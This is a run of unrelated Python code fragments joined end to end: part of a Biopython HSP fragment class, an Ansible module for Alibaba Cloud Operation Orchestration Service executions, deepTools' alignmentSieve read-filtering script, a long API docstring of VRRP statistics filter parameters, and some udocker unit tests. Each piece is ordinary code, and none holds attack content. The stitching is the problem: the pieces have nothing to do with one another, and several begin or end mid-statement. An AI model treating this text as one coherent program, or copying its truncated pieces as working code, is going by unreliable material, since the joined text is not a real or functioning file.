attr) self_val = getattr(self, attr_name) setattr(obj, attr_name, self_val) # alignment annotation should be transferred, since we can compute # the resulting annotation obj.aln_annotation = {} for key, value in self.aln_annotation.items(): assert len(value[idx]) == len(obj) obj.aln_annotation[key] = value[idx] return obj else: raise TypeError("Slicing for HSP objects without " "alignment is not supported.") def _str_aln(self): lines = [] # alignment length aln_span = getattr_str(self, 'aln_span') lines.append(' Fragments: 1 (%s columns)' % aln_span) # sequences if self.query is not None and self.hit is not None: try: qseq = str(self.query.seq) except AttributeError: # query is None qseq = '?' try: hseq = str(self.hit.seq) except AttributeError: # hit is None hseq = '?' # similarity line simil = '' if 'similarity' in self.aln_annotation and \ isinstance(self.aln_annotation.get('similarity'), basestring): simil = self.aln_annotation['similarity'] if self.aln_span <= 67: lines.append("%10s - %s" % ('Query', qseq)) if simil: lines.append(" %s" % simil) lines.append("%10s - %s" % ('Hit', hseq)) else: # adjust continuation character length, so we don't display # the same residues twice if self.aln_span - 66 > 3: cont = '~' * 3 else: cont = '~' * (self.aln_span - 66) lines.append("%10s - %s%s%s" % ('Query', qseq[:59], cont, qseq[-5:])) if simil: lines.append(" %s%s%s" % (simil[:59], cont, simil[-5:])) lines.append("%10s - %s%s%s" % ('Hit', hseq[:59], cont, hseq[-5:])) return '\n'.join(lines) # sequence properties # def _set_seq(self, seq, seq_type): """Check the given sequence for attribute setting (PRIVATE). :param seq: sequence to check :type seq: string or SeqRecord :param seq_type: sequence type :type seq_type: string, choice of 'hit' or 'query' """ assert seq_type in ('hit', 'query') if seq is None: return seq # return immediately if seq is None else: if not isinstance(seq, (basestring, SeqRecord)): raise TypeError("%s sequence must be a string or a SeqRecord" " object." % seq_type) # check length if the opposite sequence is not None opp_type = 'hit' if seq_type == 'query' else 'query' opp_seq = getattr(self, '_%s' % opp_type, None) if opp_seq is not None: if len(seq) != len(opp_seq): raise ValueError("Sequence lengths do not match. Expected: " "%r (%s); found: %r (%s)." % (len(opp_seq), opp_type, len(seq), seq_type)) seq_id = getattr(self, '%s_id' % seq_type) seq_desc = getattr(self, '%s_description' % seq_type) seq_feats = getattr(self, '%s_features' % seq_type) seq_name = 'aligned %s sequence' % seq_type if isinstance(seq, SeqRecord): seq.id = seq_id seq.description = seq_desc seq.name = seq_name seq.features = seq_feats seq.seq.alphabet = self.alphabet elif isinstance(seq, basestring): seq = SeqRecord(Seq(seq, self.alphabet), id=seq_id, name=seq_name, description=seq_desc, features=seq_feats) return seq def _hit_get(self): return self._hit def _hit_set(self, value): self._hit = self._set_seq(value, 'hit') hit = property(fget=_hit_get, fset=_hit_set, doc="""Hit sequence as a SeqRecord object, defaults to None""") def _query_get(self): return self._query def _query_set(self, value): self._query = self._set_seq(value, 'query') query = property(fget=_query_get, fset=_query_set, doc="""Query sequence as a SeqRecord object, defaults to None""") def _aln_get(self): if self.query is None and self.hit is None: return None elif self.hit is None: return MultipleSeqAlignment([self.query], self.alphabet) elif self.query is None: return MultipleSeqAlignment([self.hit], self.alphabet) else: return MultipleSeqAlignment([self.query, self.hit], self.alphabet) aln = property(fget=_aln_get, doc="""Query-hit alignment as a MultipleSeqAlignment object, defaults to None""") def _alphabet_get(self): return self._alphabet def _alphabet_set(self, value): self._alphabet = value try: self.query.seq.alphabet = value except AttributeError: pass try: self.hit.seq.alphabet = value except AttributeError: pass alphabet = property(fget=_alphabet_get, fset=_alphabet_set, doc="""Alphabet object used in the fragment's sequences and alignment, defaults to single_letter_alphabet""") def _aln_span_get(self): # length of alignment (gaps included) # alignment span can be its own attribute, or computed from # query / hit length if not hasattr(self, '_aln_span'): if self.query is not None: self._aln_span = len(self.query) elif self.hit is not None: self._aln_span = len(self.hit) return self._aln_span def _aln_span_set(self, value): self._aln_span = value aln_span = property(fget=_aln_span_get, fset=_aln_span_set, doc="""The number of alignment columns covered by the fragment""") # id, description, and features properties # hit_description = fragcascade('description', 'hit', doc="""Hit sequence description""") query_description = fragcascade('description', 'query', doc="""Query sequence description""") hit_id = fragcascade('id', 'hit', doc="""Hit sequence ID""") query_id = fragcascade('id', 'query', doc="""Query sequence ID""") hit_features = fragcascade('features', 'hit', doc="""Hit sequence features""") query_features = fragcascade('features', 'query', doc="""Query sequence features""") # strand properties # def _prep_strand(self, strand): # follow SeqFeature's convention if strand not in (-1, 0, 1, None): raise ValueError("Strand should be -1, 0, 1, or None; not %r" % strand) return strand def _get_strand(self, seq_type): assert seq_type in ('hit', 'query') strand = getattr(self, '_%s_strand' % seq_type) if strand is None: # try to compute strand from frame frame = getattr(self, '%s_frame' % seq_type) if frame is not None: try: strand = frame // abs(frame) except ZeroDivisionError: strand = 0 setattr(self, '%s_strand' % seq_type, strand) return strand def _hit_strand_get(self): return self._get_strand('hit') def _hit_strand_set(self, value): self._hit_strand = self._prep_strand(value) hit_strand = property(fget=_hit_strand_get, fset=_hit_strand_set, doc="""Hit sequence strand, defaults to None""") def _query_strand_get(self): return self._get_strand('query') def _query_strand_set(self, value): self._query_strand = self._prep_strand(value) query_strand = property(fget=_query_strand_get, fset=_query_strand_set, doc="""Query sequence strand, defaults to None""") # frame properties # def _prep_frame(self, frame): if frame not in (-3, -2, -1, 0, 1, 2, 3, None): raise ValueError("Strand should be an integer between -3 and 3, " "or None; not %r" % frame) return frame def _hit_frame_get(self): return self._hit_frame def _hit_frame_set(self, value): self._hit_frame = self._prep_frame(value) hit_frame = property(fget=_hit_frame_get, fset=_hit_frame_set, doc="""Hit sequence reading frame, defaults
<gh_stars>10-100 #!/usr/bin/python # -*- coding: utf-8 -*- # Copyright (c) 2017-present Alibaba Group Holding Limited. <NAME> <<EMAIL>> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see http://www.gnu.org/licenses/. from __future__ import (absolute_import, division, print_function) __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = """ --- module: ali_oos_execution short_description: Configure Execution Alibaba Cloud Operation Orchestration Service(OOS) description: - Create, Delete, Notify, Cancel Execution. options: state: description: - If I(state=present), execution will be started. - If I(state=absent), execution will be deleted. - If I(state=cancel), execution will be canceled. - If I(state=notify), It will notify a pending execution of how to run next. choices: ['present', 'absent', 'cancel', 'notify'] type: str default: 'present' task_execution_id: description: - The id of task execution. type: str task_name: description: - The name of task execution. type: str notify_note: description: - The note of notify. type: str loop_item: description: - Loop child nodes corresponding to Item data. type: str execution_status: description: - The status of execution. - Required when C(notify_type=CompleteExecution) type: str notify_type: description: - The type of notify. - If C(notify_type=Approve), approval of pending execution. If you know the execution risks of high-risk operations, and allow them to perform. - If C(notify_type=Reject), reject execution pending approval. If high-risk operations are not allowed to perform tasks. - If C(notify_type=ExecuteTask), specifies the start of the execution of a task, suitable for Debug mode. May need to cooperate with I(parameters). - If C(notify_type=CancelTask), cancel current task execution, applicable to when C(mode=Debug). - If C(notify_type=CompleteExecution), manually terminate execution in a debug mode. Can be used with the I(execution_status) to specify the status of execution termination. choices: ['Approve', 'Reject', 'ExecuteTask', 'CancelTask', 'CompleteExecution'] type: str executed_by: description: - The user executed execution. - when you want to cancel,delete or notify executions, you can pass it to filter executions, except it, filter params supported include (I(template_name), I(status), I(execution_ids)) type: str status: description: - The status of execution. - when you want to cancel,delete or notify executions, you can pass it to filter executions, except it, filter params supported include (I(template_name), I(executed_by), I(execution_ids)) type: str safety_check: description: - Security check mode. - If C(safety_check=Skip), means that the customer understands the risk and can perform any action without confirmation, regardless of the level of risk. Effective when C(mode=Automatic). - If C(safety_check=ConfirmEveryHighRiskAction), will ask the customer to confirm each high-risk action. The client confirms or cancels by calling the NotifyExecution interface. type: str default: ConfirmEveryHighRiskAction choices: ['Skip', 'ConfirmEveryHighRiskAction'] parent_execution_id: description: - The id of parent execution. type: str parameters: description: - Consists of a collection of parameters. type: dict mode: description: - The execution mode. type: str choices: ['Debug', 'Automatic'] loop_mode: description: - The Loop mode. type: str template_name: description: - The name of template. - when you want to start a execution, It is required. - when you want to cancel,delete or notify executions, you can pass it to filter executions, except it, filter params supported include (I(status), I(executed_by), I(execution_ids)) type: str description: description: - The description of execution. type: str execution_ids: description: - The ids of executions. - when you want to cancel,delete or notify executions, you can pass it to filter executions, except it, filter params supported include (I(status), I(executed_by), I(template_name)) type: list elements: str tags: description: - A hash/dictionaries of template tags. C({"key":"value"}) type: dict requirements: - "python >= 3.6" - "footmark >= 1.20.0" extends_documentation_fragment: - alicloud author: - "<NAME> (@xiaozhu36)" - "<NAME> (@lixue323)" """ EXAMPLES = """ # Note: These examples do not set authentication details, see the Alibaba Cloud Guide for details. - name: Changed. Start a timed execution that starts and closes instances ali_oos_execution: template_name: 'ACS-ECS-ScheduleToStartAndStopInstances' safety_check: Skip description: test execution from ansible parameters: dailyStartTime: 08:00:00Z dailyStopTime: dailyStopTime weekdays: '2' targets: Type: ResourceIds ResourceIds: - 'instances_id' tags: From: ansible - name: Changed. cancel a timed execution ali_oos_execution: state: cancel template_name: 'ACS-ECS-ScheduleToStartAndStopInstances' - name: Changed. Delete a execution ali_oos_execution: state: absent template_name: 'ACS-ECS-ScheduleToStartAndStopInstances' - name: Changed. Start a risky execution that deletes instances ali_oos_execution: template_name: 'ACS-ECS-BulkyDeleteInstances' description: test execution from ansible parameters: force: true targets: Type: ResourceIds ResourceIds: - 'instances_id' - name: Changed. notify a execution ali_oos_execution: state: notify notify_type: Approve template_name: 'ACS-ECS-BulkyDeleteInstances' - name: Changed. Delete a execution ali_oos_execution: state: absent template_name: 'ACS-ECS-BulkyDeleteInstances' """ RETURN = ''' executions: description: info about the executions that was started, notified returned: always type: complex contains: execution_id: description: The id of execution. returned: always type: str sample: exec-xxxyyy id: description: aliases of execution_id. returned: always type: str sample: exec-xxxyyy is_parent: description: Have child task or not. returned: always type: bool sample: false loop_mode: description: The loop mode. returned: always type: str sample: Automatic mode: description: mode of execution. returned: always type: str sample: Automatic out_puts: description: The output of execution. returned: always type: str sample: {"InstanceId":"i-xxx"} parameters: description: The parameters of execution. returned: always type: str sample: {"Status":"Running"} parent_execution_id: description: The id of parent execution. returned: always type: str sample: exec-xxxx ram_role: description: The ram role of execution. returned: always type: str sample: OOSServiceRole safety_check: description: The security check mode. returned: always type: str sample: Skip description: description: The description of execution. returned: always type: str sample: run instance start_date: description: The start date of the execution. returned: always type: str sample: "2019-05-16T10:26:14Z" status: description: The status of the execution. returned: always type: str sample: Success status_message: description: The message of the status. returned: always type: str sample: "" template_id: description: The id of the template. returned: always type: str sample: t-1bd341007f template_name: description: The name of the template. returned: always type: str sample: MyTemplate template_version: description: The version of template. returned: always type: str sample: v1 update_date: description: The update date of template. returned: always type: str sample: "2019-05-16T10:26:14Z" executed_by: description: The template executor. returned: always type: str sample: root(13092080xx12344) end_date: description: The end date of execution. returned: always type: str sample: "2019-05-16T10:26:14Z" task_name: description: The name of task. returned: always type: str sample: waitForReady task_execution_id: description: The id of task execution. returned: always type: str sample: exec-xxxyyy.0001 task_action: description: The action of task. returned: always type: str sample: ACS::WaitFor ''' import time from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.alicloud_ecs import ecs_argument_spec, oos_connect HAS_FOOTMARK = False try: from footmark.exception import OOSResponseError HAS_FOOTMARK = True except ImportError: HAS_FOOTMARK = False def executions_exists(module, oos_conn): try: executions = [] if module.params.get('execution_ids'): for i in module.params.get('execution_ids'): executions.extend(oos_conn.list_executions(execution_id=i)) elif module.params.get('params'): executions.extend(oos_conn.list_executions(**module.params['params'])) ids = [] if executions: for e in executions: ids.append(e.id) else: module.fail_json(msg="Failed to list executions, please make sure your params are correct") return ids except Exception as e: module.fail_json(msg="Failed to list templates: {0}".format(e)) def main(): argument_spec = ecs_argument_spec() argument_spec.update(dict( state=dict(default='present', choices=['present', 'absent', 'cancel', 'notify']), execution_ids=dict(type='list', elements='str'), description=dict(type='str'), template_name=dict(type='str', aliases=['name']), loop_mode=dict(type='str'), mode=dict(type='str', choices=['Debug', 'Automatic']), parameters=dict(type='dict'), parent_execution_id=dict(type='str'), safety_check=dict(type='str', default='ConfirmEveryHighRiskAction', choices=['Skip', 'ConfirmEveryHighRiskAction']), tags=dict(type='dict'), status=dict(type='str'), executed_by=dict(type='str'), notify_type=dict(type='str', choices=['Approve', 'Reject', 'ExecuteTask', 'CancelTask', 'CompleteExecution']), execution_status=dict(type='str'), loop_item=dict(type='str'), notify_note=dict(type='str'), task_execution_id=dict(type='str'), task_name=dict(type='str') )) module = AnsibleModule(argument_spec=argument_spec) if HAS_FOOTMARK is False: module.fail_json(msg='footmark required for this module.') oos_conn = oos_connect(module) # Get values of variable state = module.params['state'] template_name = module.params['template_name'] status = module.params['status'] executed_by = module.params['executed_by'] params = {} if template_name: params['template_name'] = template_name if status: params['status'] = status if executed_by: params['executed_by'] = executed_by changed = False if params: module.params['params'] = params if state == 'absent': ids = executions_exists(module, oos_conn) try: if oos_conn.delete_executions(execution_ids=ids): changed = True module.exit_json(changed=changed, executions={}) except OOSResponseError as e: module.fail_json(msg='Unable to delete executions {0}, error: {1}'.format(str(ids), e)) elif state ==
<gh_stars>100-1000 #!/usr/bin/env python import argparse import pysam import os import sys from deeptools import parserCommon from deeptools.bamHandler import openBam from deeptools.mapReduce import mapReduce from deeptools._version import __version__ from deeptools.utilities import getTLen, smartLabels, getTempFileName def parseArguments(): parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description="This tool filters alignments in a BAM/CRAM file according the the specified parameters. It can optionally output to BEDPE format.", usage='Example usage: alignmentSieve.py -b sample1.bam -o sample1.filtered.bam --minMappingQuality 10 --filterMetrics log.txt') required = parser.add_argument_group('Required arguments') required.add_argument('--bam', '-b', metavar='FILE1', help='An indexed BAM file.', required=True) required.add_argument('--outFile', '-o', help='The file to write results to. These are the alignments or fragments that pass the filtering criteria.') general = parser.add_argument_group('General arguments') general.add_argument('--numberOfProcessors', '-p', help='Number of processors to use. Type "max/2" to ' 'use half the maximum number of processors or "max" ' 'to use all available processors. (Default: %(default)s)', metavar="INT", type=parserCommon.numberOfProcessors, default=1, required=False) general.add_argument('--filterMetrics', metavar="FILE.log", help="The number of entries in total and filtered are saved to this file") general.add_argument('--filteredOutReads', metavar="filtered.bam", help="If desired, all reads NOT passing the filtering criteria can be written to this file.") general.add_argument('--label', '-l', metavar='sample1', help='User defined label instead of the default label ' '(file name).') general.add_argument('--smartLabels', action='store_true', help='Instead of manually specifying a labels for the input ' 'file, this causes deepTools to use the file name ' 'after removing the path and extension.') general.add_argument('--verbose', '-v', help='Set to see processing messages.', action='store_true') general.add_argument('--version', action='version', version='%(prog)s {}'.format(__version__)) general.add_argument('--shift', nargs='+', type=int, help='Shift the left and right end of a read (for BAM files) or a fragment (for BED files). A positive value shift an end to the right (on the + strand) and a negative value shifts a fragment to the left. Either 2 or 4 integers can be provided. For example, "2 -3" will shift the left-most fragment end two bases to the right and the right-most end 3 bases to the left. If 4 integers are provided, then the first and last two refer to fragments whose read 1 is on the left or right, respectively. Consequently, it is possible to take strand into consideration for strand-specific protocols. A fragment whose length falls below 1 due to shifting will not be written to the output. See the online documentation for graphical examples. Note that non-properly-paired reads will be filtered.') general.add_argument('--ATACshift', action='store_true', help='Shift the produced BAM file or BEDPE regions as commonly done for ATAC-seq. This is equivalent to --shift 4 -5 5 -4.') output = parser.add_argument_group('Output arguments') output.add_argument('--BED', action='store_true', help='Instead of producing BAM files, write output in BEDPE format (as defined by MACS2). Note that only reads/fragments passing filtering criterion are written in BEDPE format.') filtering = parser.add_argument_group('Optional arguments') filtering.add_argument('--filterRNAstrand', help='Selects RNA-seq reads (single-end or paired-end) in ' 'the given strand. (Default: %(default)s)', choices=['forward', 'reverse'], default=None) filtering.add_argument('--ignoreDuplicates', help='If set, reads that have the same orientation ' 'and start position will be considered only ' 'once. If reads are paired, the mate\'s position ' 'also has to coincide to ignore a read.', action='store_true') filtering.add_argument('--minMappingQuality', metavar='INT', help='If set, only reads that have a mapping ' 'quality score of at least this are ' 'considered.', type=int) filtering.add_argument('--samFlagInclude', help='Include reads based on the SAM flag. For example, ' 'to get only reads that are the first mate, use a flag of 64. ' 'This is useful to count properly paired reads only once, ' 'as otherwise the second mate will be also considered for the ' 'coverage.', metavar='INT', default=None, type=int, required=False) filtering.add_argument('--samFlagExclude', help='Exclude reads based on the SAM flag. For example, ' 'to get only reads that map to the forward strand, use ' '--samFlagExclude 16, where 16 is the SAM flag for reads ' 'that map to the reverse strand.', metavar='INT', default=None, type=int, required=False) filtering.add_argument('--blackListFileName', '-bl', help="A BED or GTF file containing regions that should be excluded from all analyses. Currently this works by rejecting genomic chunks that happen to overlap an entry. Consequently, for BAM files, if a read partially overlaps a blacklisted region or a fragment spans over it, then the read/fragment might still be considered. Please note that you should adjust the effective genome size, if relevant.", metavar="BED file", nargs="+", required=False) filtering.add_argument('--minFragmentLength', help='The minimum fragment length needed for read/pair ' 'inclusion. This option is primarily useful ' 'in ATACseq experiments, for filtering mono- or ' 'di-nucleosome fragments. (Default: %(default)s)', metavar='INT', default=0, type=int, required=False) filtering.add_argument('--maxFragmentLength', help='The maximum fragment length needed for read/pair ' 'inclusion. A value of 0 indicates no limit. (Default: %(default)s)', metavar='INT', default=0, type=int, required=False) return parser def shiftRead(b, chromDict, args): if not b.is_proper_pair: return None tLen = getTLen(b, notAbs=True) start = b.pos end = start + b.query_alignment_end if b.is_reverse and not b.is_read2: end -= args.shift[2] deltaTLen = args.shift[3] - args.shift[2] elif b.is_reverse and b.is_read2: end += args.shift[1] deltaTLen = args.shift[1] - args.shift[0] elif not b.is_reverse and not b.is_read2: start += args.shift[0] deltaTLen = args.shift[1] - args.shift[0] else: start -= args.shift[3] deltaTLen = args.shift[3] - args.shift[2] # Sanity check if end - start < 1: if b.is_reverse: start = end - 1 else: end = start + 1 if start < 0: start = 0 if end > chromDict[b.reference_name]: end = chromDict[b.reference_name] if end - start < 1: return None # create a new read b2 = pysam.AlignedSegment() b2.query_name = b.query_name b2.flag = b.flag b2.reference_id = b.reference_id b2.reference_start = start b2.mapping_quality = b.mapping_quality b2.cigar = ((0, end - start),) # Returned cigar is only matches if tLen < 0: b2.template_length = tLen - deltaTLen else: b2.template_length = tLen + deltaTLen b2.next_reference_id = b.next_reference_id b2.next_reference_start = b.next_reference_start if b.is_proper_pair: if b2.is_read2 and b2.is_reverse: b2.next_reference_start += args.shift[0] elif not b2.is_read2 and b2.is_reverse: b2.next_reference_start -= args.shift[3] return b2 def filterWorker(arglist): chrom, start, end, args, chromDict = arglist fh = openBam(args.bam) mode = 'wbu' oname = getTempFileName(suffix='.bam') if args.filteredOutReads: onameFiltered = getTempFileName(suffix='.bam') else: onameFiltered = None ofh = pysam.AlignmentFile(oname, mode=mode, template=fh) if onameFiltered: ofiltered = pysam.AlignmentFile(onameFiltered, mode=mode, template=fh) else: ofiltered = None prev_pos = set() lpos = None nFiltered = 0 total = 0 for read in fh.fetch(chrom, start, end): if read.pos < start: # ensure that we never double count (in case distanceBetweenBins == 0) continue total += 1 if read.flag & 4: # Ignore unmapped reads, they were counted already nFiltered += 1 if ofiltered: ofiltered.write(read) continue if args.minMappingQuality and read.mapq < args.minMappingQuality: nFiltered += 1 if ofiltered: ofiltered.write(read) continue if args.samFlagInclude and read.flag & args.samFlagInclude != args.samFlagInclude: nFiltered += 1 if ofiltered: ofiltered.write(read) continue if args.samFlagExclude and read.flag & args.samFlagExclude != 0: nFiltered += 1 if ofiltered: ofiltered.write(read) continue tLen = getTLen(read) if args.minFragmentLength > 0 and tLen < args.minFragmentLength: nFiltered += 1 if ofiltered: ofiltered.write(read) continue if args.maxFragmentLength > 0 and tLen > args.maxFragmentLength: nFiltered += 1 if ofiltered: ofiltered.write(read) continue if args.ignoreDuplicates: # Assuming more or less concordant reads, use the fragment bounds, otherwise the start positions if tLen >= 0: s = read.pos e = s + tLen else: s = read.pnext e = s - tLen if read.reference_id != read.next_reference_id: e = read.pnext if lpos is not None and lpos == read.reference_start \ and (s, e, read.next_reference_id, read.is_reverse) in prev_pos: nFiltered += 1 if ofiltered: ofiltered.write(read) continue if lpos != read.reference_start: prev_pos.clear() lpos = read.reference_start prev_pos.add((s, e, read.next_reference_id, read.is_reverse)) # filterRNAstrand if args.filterRNAstrand: if read.is_paired: if args.filterRNAstrand == 'forward': if read.flag & 144 == 128 or read.flag & 96 == 64: pass else: nFiltered += 1 if ofiltered: ofiltered.write(read) continue elif args.filterRNAstrand == 'reverse': if read.flag & 144 == 144 or read.flag & 96 == 96: pass else: nFiltered += 1 if ofiltered: ofiltered.write(read) continue else: if args.filterRNAstrand == 'forward': if read.flag & 16 == 16: pass else: nFiltered += 1 if ofiltered: ofiltered.write(read) continue elif args.filterRNAstrand == 'reverse': if read.flag & 16 == 0: pass else: nFiltered += 1 if ofiltered: ofiltered.write(read) continue if args.shift: read = shiftRead(read, chromDict, args) if not read: continue # Read survived filtering ofh.write(read) # The results from the workers will get sorted, so get the
specified. :type val_f_VrrpAdvertiseIntervalErrors: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_VrrpAdvertiseIntervalErrors: If op_VrrpAdvertiseIntervalErrors is specified, this value will be compared to the value in VrrpAdvertiseIntervalErrors using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAdvertiseIntervalErrors must be specified if op_VrrpAdvertiseIntervalErrors is specified. :type val_c_VrrpAdvertiseIntervalErrors: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_VrrpAdvertiseRcvd: The operator to apply to the field VrrpAdvertiseRcvd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpAdvertiseRcvd: The received advertise of the Vrrp router statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_VrrpAdvertiseRcvd: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_VrrpAdvertiseRcvd: If op_VrrpAdvertiseRcvd is specified, the field named in this input will be compared to the value in VrrpAdvertiseRcvd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpAdvertiseRcvd must be specified if op_VrrpAdvertiseRcvd is specified. :type val_f_VrrpAdvertiseRcvd: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_VrrpAdvertiseRcvd: If op_VrrpAdvertiseRcvd is specified, this value will be compared to the value in VrrpAdvertiseRcvd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAdvertiseRcvd must be specified if op_VrrpAdvertiseRcvd is specified. :type val_c_VrrpAdvertiseRcvd: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_VrrpAuthFailures: The operator to apply to the field VrrpAuthFailures. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpAuthFailures: The total number of authentication failures occurred in the Vrrp router statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_VrrpAuthFailures: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_VrrpAuthFailures: If op_VrrpAuthFailures is specified, the field named in this input will be compared to the value in VrrpAuthFailures using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpAuthFailures must be specified if op_VrrpAuthFailures is specified. :type val_f_VrrpAuthFailures: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_VrrpAuthFailures: If op_VrrpAuthFailures is specified, this value will be compared to the value in VrrpAuthFailures using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAuthFailures must be specified if op_VrrpAuthFailures is specified. :type val_c_VrrpAuthFailures: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_VrrpAuthTypeMismatch: The operator to apply to the field VrrpAuthTypeMismatch. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpAuthTypeMismatch: The mismatch authentication type. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_VrrpAuthTypeMismatch: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_VrrpAuthTypeMismatch: If op_VrrpAuthTypeMismatch is specified, the field named in this input will be compared to the value in VrrpAuthTypeMismatch using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpAuthTypeMismatch must be specified if op_VrrpAuthTypeMismatch is specified. :type val_f_VrrpAuthTypeMismatch: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_VrrpAuthTypeMismatch: If op_VrrpAuthTypeMismatch is specified, this value will be compared to the value in VrrpAuthTypeMismatch using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAuthTypeMismatch must be specified if op_VrrpAuthTypeMismatch is specified. :type val_c_VrrpAuthTypeMismatch: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_VrrpBecomeMaster: The operator to apply to the field VrrpBecomeMaster. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpBecomeMaster: The master of the Vrrp Router Statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_VrrpBecomeMaster: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_VrrpBecomeMaster: If op_VrrpBecomeMaster is specified, the field named in this input will be compared to the value in VrrpBecomeMaster using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpBecomeMaster must be specified if op_VrrpBecomeMaster is specified. :type val_f_VrrpBecomeMaster: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_VrrpBecomeMaster: If op_VrrpBecomeMaster is specified, this value will be compared to the value in VrrpBecomeMaster using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpBecomeMaster must be specified if op_VrrpBecomeMaster is specified. :type val_c_VrrpBecomeMaster: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_VrrpInvalidAuthType: The operator to apply to the field VrrpInvalidAuthType. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpInvalidAuthType: The Invalid Authentication type of Vrrp Router Statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_VrrpInvalidAuthType: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_VrrpInvalidAuthType: If op_VrrpInvalidAuthType is specified, the field named in this input will be compared to the value in VrrpInvalidAuthType using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpInvalidAuthType must be specified if op_VrrpInvalidAuthType is specified. :type val_f_VrrpInvalidAuthType: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_VrrpInvalidAuthType: If op_VrrpInvalidAuthType is specified, this value will be compared to the value in VrrpInvalidAuthType using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpInvalidAuthType must be specified if op_VrrpInvalidAuthType is specified. :type val_c_VrrpInvalidAuthType: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_VrrpInvalidTypePktsRcvd: The operator to apply to the field VrrpInvalidTypePktsRcvd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpInvalidTypePktsRcvd: The packet received with Invalid Type. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_VrrpInvalidTypePktsRcvd: String | ``api version min:`` None | ``api version max:``
= udoc.do_rmi(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.isprotected_imagerepo.return_value = True status = udoc.do_rmi(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.isprotected_imagerepo.return_value = False status = udoc.do_rmi(mock_cmdp) self.assertTrue(status) @mock.patch('udocker.Udocker._check_imagespec') @mock.patch('udocker.CmdParser') @mock.patch('udocker.KeyStore') @mock.patch('udocker.DockerLocalFileAPI') @mock.patch('udocker.DockerIoAPI') @mock.patch('udocker.Msg') @mock.patch('udocker.LocalRepository') def test_21_do_protect(self, mock_local, mock_msg, mock_dioapi, mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg): """Test21 Udocker().do_protect().""" self._init() mock_msg.level = 0 udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = True mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") status = udoc.do_protect(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "123" mock_local.protect_container.return_value = False status = udoc.do_protect(mock_cmdp) 